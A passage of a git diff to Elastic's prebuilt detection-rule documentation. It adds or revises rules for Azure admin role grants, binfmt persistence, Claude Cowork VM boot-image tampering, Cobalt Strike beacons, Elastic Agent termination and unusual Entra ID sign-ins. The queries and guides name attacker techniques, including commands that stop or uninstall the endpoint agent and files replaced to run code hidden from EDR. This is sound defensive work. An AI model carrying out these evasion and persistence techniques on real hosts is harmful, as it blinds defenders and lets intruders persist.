a/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc index c4b2c13545..e895d31471 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc @@ -29,13 +29,17 @@ Identifies when a user is assigned a built-in administrator role in Azure RBAC ( *Tags*: * Domain: Cloud +* Domain: Identity * Data Source: Azure * Data Source: Azure Activity Logs +* Platform: Azure +* Rule Type: Custom Query (KQL) * Use Case: Identity and Access Audit * Tactic: Privilege Escalation +* Tactic: Persistence * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -48,7 +52,7 @@ Identifies when a user is assigned a built-in administrator role in Azure RBAC ( -*Triage and Analysis* +*Triage and analysis* @@ -84,6 +88,8 @@ This rule identifies when a user is assigned a built-in administrator role in Az - Legitimate administrators may assign built-in administrator roles during routine operations, maintenance or as required for onboarding new staff. +- Azure Kubernetes Service control-plane operations may assign the Contributor role to service principals. Assignments initiated by the Microsoft-owned AzureContainerService application are excluded. +- Repeated writes for the same role assignment ID by the same initiating principal are suppressed for one hour. - Review internal tickets, change logs, or admin activity dashboards for approved operations. @@ -118,7 +124,12 @@ data_stream.dataset: azure.activitylogs and *8e3af657-a8ff-443c-a75c-2fe8c4bcb635* or *92b92042-07d9-4307-87f7-36a593fc5850* or *a8889054-8d42-49c9-bc1c-52486c10e7cd* - ) + ) and not ( + azure.activitylogs.identity.claims.appid: "7319c514-987d-4e9b-ac3d-d38c4f427f4c" and + azure.activitylogs.identity.authorization.evidence.role: "Service Owner role" and + azure.activitylogs.identity.authorization.evidence.principal_type: "ServicePrincipal" and + azure.activitylogs.properties.requestbody.properties.roleDefinitionId: *b24988ac-6180-42a0-ab88-20f7382dd24c* + ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/binfmt-configuration-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/binfmt-configuration-file-creation.asciidoc new file mode 100644 index 0000000000..559e641b86 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/binfmt-configuration-file-creation.asciidoc @@ -0,0 +1,154 @@ +[[binfmt-configuration-file-creation]] +=== Binfmt Configuration File Creation + +This rule detects the creation of a binfmt configuration file. Binfmt is a utility that is used to configure the behavior of the Linux kernel when executing binary files. By creating a malicious binfmt configuration file, threat actors can execute a backdoor script or command on the target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dfir.ch/posts/today_i_learned_binfmt_misc/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Platform: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Binfmt Configuration File Creation* + + +This rule detects creation of Linux binfmt configuration files or registrations that alter how the kernel handles executable formats, which may establish persistent command execution. An attacker can register a crafted binary signature and interpreter so that launching a matching executable automatically invokes a backdoor script under the initiating user’s privileges. + + +*Possible investigation steps* + + +- Inspect the new configuration or registration content for unusual magic bytes, masks, flags, extensions, and interpreter paths that reference scripts, writable directories, temporary locations, or network-mounted files. +- Review the creating process’s user, command line, parent chain, working directory, package provenance, and nearby shell or privilege-escalation activity to determine whether the change was authorized. +- Correlate the event with systemd-binfmt restarts, writes to the binfmt_misc register interface, and subsequent execution of the configured interpreter or matching binaries. +- Search across the environment for the same configuration content, interpreter path, file hash, or responsible account to identify additional affected hosts and determine campaign scope. +- If unauthorized, preserve the configuration and relevant telemetry, disable or unregister the handler, remove persistence artifacts, and investigate the originating account and process for further compromise. + + +*False positive analysis* + + +- An administrator or approved automation may create a binfmt configuration to support a legitimate binary format, which analysts can verify by reviewing the change record, responsible account, configuration contents, and interpreter path. +- An authorized package installation or system update may register or replace a binfmt handler, which analysts can confirm by correlating the event with package activity and validating the creating process and file against expected system changes. + + +*Response and remediation* + + +- Isolate the affected Linux host from untrusted networks while preserving approved management access, volatile evidence, and copies of the malicious binfmt configuration and interpreter. +- Unregister the malicious handler under `/proc/sys/fs/binfmt_misc`, remove its files from binfmt configuration directories, delete associated backdoor scripts or binaries, and restart `systemd-binfmt` only after validating remaining entries. +- Escalate immediately to incident response if the configured interpreter executed, root privileges were involved, credentials may have been exposed, or matching artifacts appear on additional hosts. +- Revoke attacker-controlled sessions, rotate credentials used on the host, and search for related scheduled tasks, services, startup files, modified SSH keys, and payloads created by the responsible process. +- Reimage the system from a known-good baseline when integrity cannot be established; otherwise restore trusted configuration files and packages, verify kernel and system binaries, and confirm only approved binfmt handlers remain. +- Restrict write access to binfmt configuration paths and registration interfaces, enforce least privilege for administrative automation, and monitor future handler creation, registration, and interpreter execution. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action != "deletion" and process.executable != null and +file.path like ( + "/etc/binfmt.d/*.conf", "/run/binfmt.d/*.conf", "/usr/local/lib/binfmt.d/*.conf", "/usr/lib/binfmt.d/*.conf", + "/proc/sys/fs/binfmt_misc/register", "/proc/sys/fs/binfmt_misc/*" +) and +not ( + file.path like ( + "/usr/lib/binfmt.d/python3.*.conf", "/usr/lib/binfmt.d/qemu-*-static.conf", + "/proc/sys/fs/binfmt_misc/status" + ) or + process.executable == "/usr/lib/systemd/systemd-binfmt" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ diff --git a/docs/detections/prebuilt-rules/rule-details/claude-cowork-vm-boot-image-tamper.asciidoc b/docs/detections/prebuilt-rules/rule-details/claude-cowork-vm-boot-image-tamper.asciidoc new file mode 100644 index 0000000000..6ac6605a9f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/claude-cowork-vm-boot-image-tamper.asciidoc @@ -0,0 +1,144 @@ +[[claude-cowork-vm-boot-image-tamper]] +=== Claude Cowork VM Boot Image Tamper + +Detects unexpected modification of Claude Desktop Cowork VM boot images (kernel, initrd, root filesystem). Adversaries with user-context access can rewrite these stored images so later Cowork sessions boot attacker-controlled code inside a virtual instance that host EDR cannot inspect by default. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://y637f9qq2x.com/posts/cowork-boot-trust + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Claude Cowork VM Boot Image Tamper* + + +Cowork boots a local Linux VM from images under the user's Claude AppData / Application Support tree. Those files are +writable by the user and are not integrity-checked before boot. A non-Claude writer changing them is a strong signal of +post-compromise defense evasion: later Cowork sessions can run attacker code inside a sanctioned Hyper-V / +Virtualization.framework guest that host EDR does not see by default. This does not grant new privileges. + + +*Possible investigation steps* + + +- Confirm the writer: `process.name`, `process.executable`, `process.parent.executable`, and `user.name`. This rule + already excludes Claude Desktop (`claude.exe` under `WindowsApps\Claude_*\app\`, and `Claude` / + `Claude Helper` under `/Applications/Claude.app/`). Any other writer (script host, LOLBin, unsigned binary) is + unexpected. +- Note which artifact changed (`file.name` / `file.path`) and `event.action`: + - `initrd` / `initrd.zst`: primary PoC target; both are often replaced together so the service cannot re-extract a + clean initrd from the `.zst`. + - `vmlinuz` / `rootfs.*` / `smol-bin.vhdx`: full guest control if replaced. +- Pivot on `process.entity_id` / `host.id` for ~30m around the alert: how the writer started, other file writes under + the Claude package path, and whether `claude.exe` / Claude.app then started a Cowork session. +- If Cowork runs afterward, check whether the session failed and Claude re-downloaded images (careless tamper) or + continued normally (payload may have kept the expected guest daemon alive). +- Treat this as evidence of existing host compromise; hunt for the initial access that produced the writer process. + + +*False positive analysis* + + +- Claude Desktop updates should not alert; if they do, the install path likely changed (new WindowsApps package layout + or non-AppX install) and the allowlist needs updating, not an exception for the writer name alone. +- Backup or sync tools rewriting these exact filenames are uncommon; require a stable `process.executable` before + adding an exception. This rule watches create/overwrite/rename/modification only; deletions are out of scope. + + +*Response and remediation* + + +- Delete or restore the affected bundle directory (Windows: + `%LOCALAPPDATA%\Packages\Claude_*\LocalCache\Roaming\Claude\vm_bundles\claudevm.bundle\`; macOS: + `~/Library/Application Support/Claude/vm_bundles/claudevm.bundle/`) and let Claude re-download trusted images, or + restore from a known-good backup. +- Isolate the host and investigate the writer process lineage; rotate credentials and secrets available to that user. +- Search the environment for the same writer hash/path and for other unexpected modifications under Claude package + paths. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type in ("windows", "macos") and + event.action in ("creation", "modification", "overwrite", "rename") and + event.outcome == "success" and + file.path : ( + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/initrd", + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/initrd.zst", + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/vmlinuz", + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/vmlinuz.zst", + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/rootfs.img", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\initrd", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\initrd.zst", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\vmlinuz", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\rootfs.vhdx", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\smol-bin.vhdx" + ) and + not ( + (process.name : "claude.exe" and + process.executable : "?:\\Program Files\\WindowsApps\\Claude_*\\app\\claude.exe") or + (process.name : ("Claude", "Claude Helper") and + process.executable like "/Applications/Claude.app/*") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Run Virtual Instance +** ID: T1564.006 +** Reference URL: https://attack.mitre.org/techniques/T1564/006/ diff --git a/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc index 18ae4df5b2..d71c55f508 100644 --- a/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc @@ -28,9 +28,12 @@ Cobalt Strike is a threat emulation platform commonly modified and used by adver * Use Case: Threat Detection * Tactic: Command and Control * Domain: Endpoint +* Rule Type: ESQL +* Data Source: Fortinet +* Data Source: PAN-OS * Resources: Investigation Guide -*Version*: 111 +*Version*: 112 *Rule authors*: @@ -99,10 +102,11 @@ This activity has been observed in FIN7 campaigns. [source, js] ---------------------------------- -from packetbeat-*, filebeat-*, logs-network_traffic.* metadata _id, _version, _index +from packetbeat-*, filebeat-*, logs-network_traffic.*, logs-panw.panos*, logs-fortinet_fortigate.log-* metadata _id, _version, _index | where ( (event.category in ("network", "network_traffic") and network.protocol in ("tls", "http")) or - data_stream.dataset in ("network_traffic.tls", "network_traffic.http") + (data_stream.dataset == "panw.panos" and network.application in ("ssl", "web-browsing")) or + data_stream.dataset in ("network_traffic.tls", "network_traffic.http", "fortinet_fortigate.log") ) | where destination.domain RLIKE "[a-z]{3}\\.stage\\.[0-9]{8}\\..*" | keep @timestamp, destination.domain, source.ip, destination.ip, network.protocol, data_stream.dataset, _id, _version, _index diff --git a/docs/detections/prebuilt-rules/rule-details/dumping-account-hashes-via-built-in-commands.asciidoc b/docs/detections/prebuilt-rules/rule-details/dumping-account-hashes-via-built-in-commands.asciidoc index e550c5911c..5672f46823 100644 --- a/docs/detections/prebuilt-rules/rule-details/dumping-account-hashes-via-built-in-commands.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/dumping-account-hashes-via-built-in-commands.asciidoc @@ -33,11 +33,12 @@ Identifies the execution of macOS built-in commands used to dump user account ha * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 112 +*Version*: 113 *Rule authors*: * Elastic +* Massimo Bertocchi *Rule license*: Elastic License v2 diff --git a/docs/detections/prebuilt-rules/rule-details/elastic-agent-service-terminated.asciidoc b/docs/detections/prebuilt-rules/rule-details/elastic-agent-service-terminated.asciidoc index 1d37bf20b4..01af06fcb0 100644 --- a/docs/detections/prebuilt-rules/rule-details/elastic-agent-service-terminated.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/elastic-agent-service-terminated.asciidoc @@ -7,7 +7,7 @@ Identifies the Elastic endpoint agent has stopped and is no longer running on th *Rule indices*: -* logs-endpoint.events.* +* logs-endpoint.events.process* *Severity*: medium @@ -32,7 +32,7 @@ Identifies the Elastic endpoint agent has stopped and is no longer running on th * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 114 +*Version*: 115 *Rule authors*: @@ -97,11 +97,9 @@ The Elastic Agent is a crucial component for monitoring and securing endpoints a *Setup* -If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, -events will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2. -Hence for this rule to work effectively, users will need to add a custom ingest pipeline to populate -`event.ingested` to @timestamp. -For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend ==== Rule query @@ -113,9 +111,37 @@ process where event.type == "start" and ( /* net, sc or wmic stopping or deleting Elastic Agent on Windows */ ( - process.name : ("net.exe", "sc.exe", "wmic.exe","powershell.exe","taskkill.exe","PsKill.exe","ProcessHacker.exe") and - process.args : ("stopservice","uninstall", "stop", "disabled","Stop-Process","terminate","suspend") and - process.args : ("elasticendpoint", "Elastic Agent","elastic-agent","elastic-endpoint") + process.name : ("net.exe", "sc.exe", "wmic.exe", "powershell.exe", "taskkill.exe", "PsKill.exe", "ProcessHacker.exe") and + process.args : ("stopservice", "uninstall", "stop", "disabled", "Stop-Process", "terminate", "suspend") and + process.args : ("elasticendpoint", "Elastic Agent", "elastic-agent", "elastic-endpoint") + ) or + + /* direct uninstallation of Elastic Agent or Elastic Endpoint on Windows */ + ( + host.os.type == "windows" and + process.name : ("elastic-agent.exe", "endpoint-security.exe", "elastic-endpoint.exe") and + process.args : "uninstall" and + /* exclude legitimate Elastic-managed reinstall, upgrade, and uninstall subprocesses */ + not ( + process.parent.code_signature.trusted == true and + process.parent.code_signature.subject_name == "Elasticsearch, Inc." and + ( + ( + process.name : "elastic-agent.exe" and process.args : "--force" and + process.parent.name : "elastic-agent.exe" and process.parent.args : "install" and + process.parent.args : ("--force", "-f") + ) or + ( + process.parent.name : "endpoint-security.exe" and + process.executable : "*\\components\\previous\\elastic-endpoint.exe" and + process.args : "--keepstate" and process.parent.args : "--upgrade" + ) or + ( + process.name : "endpoint-security.exe" and process.parent.name : "elastic-agent.exe" and + process.parent.args : "uninstall" + ) + ) + ) ) or /* service or systemctl used to stop Elastic Agent on Linux */ diff --git a/docs/detections/prebuilt-rules/rule-details/elastic-defend-alert-followed-by-telemetry-loss.asciidoc b/docs/detections/prebuilt-rules/rule-details/elastic-defend-alert-followed-by-telemetry-loss.asciidoc index 168f707426..e51f7a97f3 100644 --- a/docs/detections/prebuilt-rules/rule-details/elastic-defend-alert-followed-by-telemetry-loss.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/elastic-defend-alert-followed-by-telemetry-loss.asciidoc @@ -15,7 +15,7 @@ Detects when an Elastic Defend endpoint alert is generated on a host and is not *Runs every*: 5m -*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-14m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Detects when an Elastic Defend endpoint alert is generated on a host and is not * Rule Type: Higher-Order Rule * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -97,7 +97,7 @@ disablement, host shutdown, system crash, or defense evasion behavior. [source, js] ---------------------------------- -sequence by host.id with maxspan=5m +sequence by host.id with maxspan=10m [any where data_stream.dataset == "endpoint.alerts"] ![any where event.category in ("process", "library", "registry", "network", "dns", "file")] diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client.asciidoc index c572e8119e..4c7f46c873 100644 --- a/docs/detections/prebuilt-rules/rule-details/entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client.asciidoc @@ -22,6 +22,8 @@ Identifies rare occurrences of OAuth workflow for a user principal that is singl *References*: +* https://aadinternals.com/post/phishing/ +* https://dirkjanm.io/assets/raw/Finding%20Entra%20ID%20CA%20Bypasses%20-%20the%20structured%20way.pdf * https://github.com/Flangvik/TeamFiltration * https://www.proofpoint.com/us/blog/threat-insight/attackers-unleash-teamfiltration-account-takeover-campaign @@ -32,11 +34,14 @@ Identifies rare occurrences of OAuth workflow for a user principal that is singl * Use Case: Threat Detection * Data Source: Azure * Data Source: Microsoft Entra ID -* Data Source: Microsoft Entra ID Sign-In Logs +* Data Source: Microsoft Entra ID Sign-in Logs +* Platform: Entra ID * Tactic: Initial Access +* Tactic: Defense Evasion +* Rule Type: New Terms * Resources: Investigation Guide -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -49,7 +54,7 @@ Identifies rare occurrences of OAuth workflow for a user principal that is singl -*Triage and Analysis* +*Triage and analysis* @@ -80,6 +85,8 @@ unauthorized access attempts, especially when the user type is `Member` and the - Some legitimate applications may use the `user_impersonation` scope for valid purposes, such as accessing user resources on behalf of the user. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. - Users may occasionally authenticate using single-factor authentication for specific applications or scenarios, especially in environments where MFA is not enforced or required. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications. - Some applications may use the `user_impersonation` scope for legitimate purposes, such as accessing user resources in a controlled manner. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. +- The `restricted_user_impersonation` scope is distinct from `user_impersonation` and is excluded. +- Expected OCaaS bootstrap requests from Exchange Online or Microsoft Forms Web are excluded when they originate from compliant, managed, joined Windows devices and do not use an incoming refresh token or primary refresh token. *Response and remediation* @@ -100,33 +107,48 @@ unauthorized access attempts, especially when the user type is `Member` and the [source, js] ---------------------------------- -data_stream.dataset: azure.signinlogs and - azure.signinlogs.properties.authentication_processing_details: *user_impersonation* and - azure.signinlogs.properties.authentication_requirement: "singleFactorAuthentication" and - azure.signinlogs.properties.token_issuer_type: "AzureAD" and - azure.signinlogs.properties.token_protection_status_details.sign_in_session_status: "unbound" and - azure.signinlogs.properties.user_type: "Member" and - azure.signinlogs.properties.conditional_access_status: "notApplied" and - not user_agent.original: (Mozilla*PKeyAuth/1.0 or Microsoft*Authentication*iPhone*) and - not azure.signinlogs.properties.device_detail.operating_system: (Ios* or Android*) and - event.outcome: "success" - and not azure.signinlogs.properties.app_id: ( - "a5f63c0-b750-4f38-a71c-4fc0d58b89e2" or - "6bc3b958-689b-49f5-9006-36d165f30e00" or - "66a88757-258c-4c72-893c-3e8bed4d6899" or - "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe" or - "0000000c-0000-0000-c000-000000000000" or - "0a5f63c0-b750-4f38-a71c-4fc0d58b89e2" or - "48af08dc-f6d2-435f-b2a7-069abd99c086" or - "ab9b8c07-8f02-4f72-87fa-80105867a763" or - "fc0f3af4-6835-4174-b806-f7db311fd2f3" or - "5e3ce6c0-2b1f-4285-8d4b-75ee78787346" or - "e8be65d6-d430-4289-a665-51bf2a194bda" or - "95de633a-083e-42f5-b444-a4295d8e9314" or - "d52792f4-ba38-424d-8140-ada5b883f293" or - "65d91a3d-ab74-42e6-8a2f-0add61688c74" or - "8c59ead7-d703-4a27-9e55-c96a0054c8d2" - ) +data_stream.dataset:azure.signinlogs and +azure.signinlogs.properties.authentication_processing_details:(*user_impersonation* and not *restricted_user_impersonation*) and +azure.signinlogs.properties.authentication_requirement:singleFactorAuthentication and +azure.signinlogs.properties.token_issuer_type:AzureAD and +azure.signinlogs.properties.token_protection_status_details.sign_in_session_status:unbound and +azure.signinlogs.properties.user_type:Member and +azure.signinlogs.properties.conditional_access_status:"notApplied" and +not user_agent.original:(Microsoft*Authentication*iPhone* or Mozilla*PKeyAuth/1.0) and +not azure.signinlogs.properties.device_detail.operating_system:(Android* or Ios*) and +event.outcome:success and +not azure.signinlogs.properties.app_id:( + 0000000c-0000-0000-c000-000000000000 or + 0a5f63c0-b750-4f38-a71c-4fc0d58b89e2 or + 48af08dc-f6d2-435f-b2a7-069abd99c086 or + 5e3ce6c0-2b1f-4285-8d4b-75ee78787346 or + 65d91a3d-ab74-42e6-8a2f-0add61688c74 or + 66a88757-258c-4c72-893c-3e8bed4d6899 or + 6bc3b958-689b-49f5-9006-36d165f30e00 or + 8c59ead7-d703-4a27-9e55-c96a0054c8d2 or + 95de633a-083e-42f5-b444-a4295d8e9314 or + ab9b8c07-8f02-4f72-87fa-80105867a763 or + cc15fd57-2c6c-4117-a88c-83b1d56b4bbe or + d52792f4-ba38-424d-8140-ada5b883f293 or + e8be65d6-d430-4289-a665-51bf2a194bda or + fc0f3af4-6835-4174-b806-f7db311fd2f3 +) and +not ( + azure.signinlogs.properties.resource_id:c2ada927-a9e2-4564-aae2-70775a2fa0af and + ( + azure.signinlogs.properties.app_id:00000002-0000-0ff1-ce00-000000000000 and + azure.signinlogs.properties.device_detail.operating_system:Windows or + azure.signinlogs.properties.app_id:5f00fd34-f302-417f-81ef-1adda179d8fd and + azure.signinlogs.properties.device_detail.operating_system:Windows* + ) and + azure.signinlogs.properties.device_detail.is_managed:true and + azure.signinlogs.properties.device_detail.is_compliant:true and + azure.signinlogs.properties.device_detail.trust_type:("Azure AD joined" or "Hybrid Azure AD joined") and + azure.signinlogs.properties.device_detail.device_id:(* and not "") and + azure.signinlogs.properties.incoming_token_type:none and + azure.signinlogs.properties.client_app_used:Browser and + azure.signinlogs.category:NonInteractiveUserSignInLogs +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-sharepoint-or-onedrive-accessed-by-unusual-client.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-sharepoint-or-onedrive-accessed-by-unusual-client.asciidoc index 7f1732eff4..fd70c9293a 100644 --- a/docs/detections/prebuilt-rules/rule-details/entra-id-sharepoint-or-onedrive-accessed-by-unusual-client.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-sharepoint-or-onedrive-accessed-by-unusual-client.asciidoc @@ -38,8 +38,9 @@ Identifies when an application accesses SharePoint Online or OneDrive for Busine * Data Source: Microsoft Entra ID * Data Source: Microsoft Entra ID Sign-in Logs * Resources: Investigation Guide +* Rule Type: New Terms -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -80,7 +81,7 @@ This rule identifies when an application accesses SharePoint Online or OneDrive - New Legitimate Integrations: Newly deployed third-party SaaS applications (e.g., document management, collaboration tools) that integrate with SharePoint will trigger this detection during initial setup. Validate with IT/procurement teams. -- Microsoft First-Party Applications: This rule excludes common Microsoft first-party apps (Office 365 SharePoint Online, OneDrive SyncEngine, OneDrive iOS App, Microsoft Office, SharePoint Web Client Extensibility, Microsoft Teams, Office 365 Exchange Online, and other Microsoft-owned app IDs). However, new Microsoft applications or features may still appear. Cross-reference unfamiliar app IDs against Microsoft's first-party app list. +- Microsoft First-Party Applications: This rule excludes known SharePoint, OneDrive, Outlook Web, and Teams web or service clients that commonly access SharePoint. It also excludes service-principal sign-ins when the application is owned by Microsoft's tenant. User sign-ins from reusable first-party clients such as Outlook Mobile, Microsoft Teams, and Microsoft Office remain detectable because adversaries can abuse these clients in OAuth phishing. - Development/Testing: Developers testing OAuth flows or building internal applications may generate alerts in development or staging environments. - Organizational Changes: Mergers, acquisitions, or tenant migrations may introduce legitimate applications from partner organizations accessing SharePoint for the first time. @@ -117,20 +118,26 @@ To use this rule, ensure that Microsoft Entra ID Sign-In Logs are being collecte [source, js] ---------------------------------- -data_stream.dataset:azure.signinlogs - and azure.signinlogs.properties.resource_id: ( - 00000003-0000-0ff1-ce00-000000000000 or - 6a9b9266-8161-4a7b-913a-a9eda19da220 - ) and azure.signinlogs.properties.app_id: ( * - and not ( - 00000003-0000-0ff1-ce00-000000000000 or - 08e18876-6177-487e-b8b5-cf950c1e598c or - ab9b8c07-8f02-4f72-87fa-80105867a763 or - af124e86-4e96-495a-b70a-90f90ab96707 - ) - ) - and azure.signinlogs.properties.tenant_id:* - and event.outcome:success +data_stream.dataset:azure.signinlogs and +azure.signinlogs.properties.resource_id:( + 00000003-0000-0ff1-ce00-000000000000 or + 6a9b9266-8161-4a7b-913a-a9eda19da220 +) and +azure.signinlogs.properties.app_id:(* and not ( + 00000003-0000-0ff1-ce00-000000000000 or + 08e18876-6177-487e-b8b5-cf950c1e598c or + 5e3ce6c0-2b1f-4285-8d4b-75ee78787346 or + 9199bf20-a13f-4107-85dc-02114787ef48 or + ab9b8c07-8f02-4f72-87fa-80105867a763 or + af124e86-4e96-495a-b70a-90f90ab96707 or + cc15fd57-2c6c-4117-a88c-83b1d56b4bbe +)) and +not ( + azure.signinlogs.properties.app_owner_tenant_id:f8cdef31-a31e-4b4a-93e4-5f571e91255a and + azure.signinlogs.category:MicrosoftServicePrincipalSignInLogs +) and +azure.signinlogs.properties.tenant_id:* and +event.outcome:success ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-authentication-type.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-authentication-type.asciidoc index 8d6d3b2a5b..5ecf6cff75 100644 --- a/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-authentication-type.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-authentication-type.asciidoc @@ -1,7 +1,7 @@ [[entra-id-user-sign-in-with-unusual-authentication-type]] === Entra ID User Sign-in with Unusual Authentication Type -Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. +Identifies 